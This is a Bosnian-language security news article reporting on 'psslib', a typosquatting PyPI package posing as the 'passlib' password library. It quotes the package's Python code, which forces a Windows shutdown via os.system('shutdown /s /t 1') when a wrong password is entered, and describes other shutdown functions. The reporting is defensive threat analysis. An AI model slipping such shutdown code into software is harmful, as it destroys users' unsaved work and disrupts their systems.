Na Python Package Index (PyPI) platformi se pojavio zlonamjerni paket nazvan “psslib” koji se predstavlja kao legitimna sigurnosna biblioteka za upravljanje lozinkama, a cilja programere na Windows operativnom sistemu. Ovaj paket izaziva prisilno isključivanje sistema čim korisnik unese pogrešnu lozinku.
“psslib” predstavlja sofisticiran napad tipskvoterske (typosquatting) prirode na popularnu biblioteku “passlib”, koju mjesečno preuzima preko 8,9 miliona programera koji implementiraju sigurnosne sisteme autentifikacije.
Malver koristi naročito podmukao pristup eksploatišući povjerenje programera u pakete usmjerene na sigurnost. Za razliku od uobičajenih napada u lancu snabdijevanja koji prikriveno kradu podatke ili uspostavljaju trajnost, ovaj paket prioritet daje neposrednom ometanju umjesto prikrivenom djelovanju.
Paket je objavio akter prijetnje pod imenom “umaraq”, lažno se reklamirajući kao sigurnosno rješenje koje će “osigurati vaše Python programe”, dok zapravo sadrži destruktivni kod dizajniran da uzrokuje trenutnu štetu sistemu.
Istraživači iz Socket.dev su otkrili zlonamjerni paket putem svojih AI-pogonjenih sistema za skeniranje, koji su destruktivno ponašanje isključivanja sistema označili kao nenormalno za navodnu sigurnosnu biblioteku.
Uprkos formalnim zahtjevima za uklanjanje, paket je i dalje aktivan na PyPI-u, nastavljajući da predstavlja rizik za nesvjesne programere koji ga mogu slučajno instalirati prilikom uobičajenog upravljanja zavisnostima.
Ovaj napad specifično cilja Windows razvojna okruženja, gdje Python programeri često posjeduju povlaštena sistemska prava neophodna za automatizaciju i razvojne zadatke. Kada ovi programeri integrišu zlonamjerni paket u svoje radne procese, destruktivni teret dobija pristup na nivou sistema potreban za izvršavanje trenutnih naredbi za isključivanje, što potencijalno može uzrokovati gubitak podataka i poremećaj radnih procesa unutar razvojnih timova.
**Tehnička implementacija i mehanizam napada**
“psslib” paket implementira svoj destruktivni teret putem naizgled jednostavnih Python funkcija koje koriste biblioteku easygui za interakciju s korisnikom i os modul za sistemske komande. Glavni vektor napada se fokusira na funkciju provjere lozinke koja odmah pokreće isključivanje Windowsa kada korisnici unesu netačne akreditive.
“`python
import os
import easygui
def spc(password):
if easygui.enterbox(‘enter password:-‘) != password:
os.system(“shutdown /s /t 1”) # Shutdown in 1 second
“`
Pored isključivanja sistema pokrenutog lozinkom, paket sadrži i dodatne funkcije dizajnirane da prošire vektore napada. Funkcija “src()” omogućava direktno isključivanje sistema bez ikakvih zahtjeva za autentifikaciju, dok funkcija “error()” kombinira prikaz poruka o greškama sa prisilnim izvršavanjem isključivanja. Ovi višestruki vektori napada osiguravaju da se zlonamjerni teret može izvršiti bez obzira na to kako programeri integrišu paket u svoje aplikacije, maksimizirajući potencijal za sistemski poremećaj u različitim scenarijima implementacije.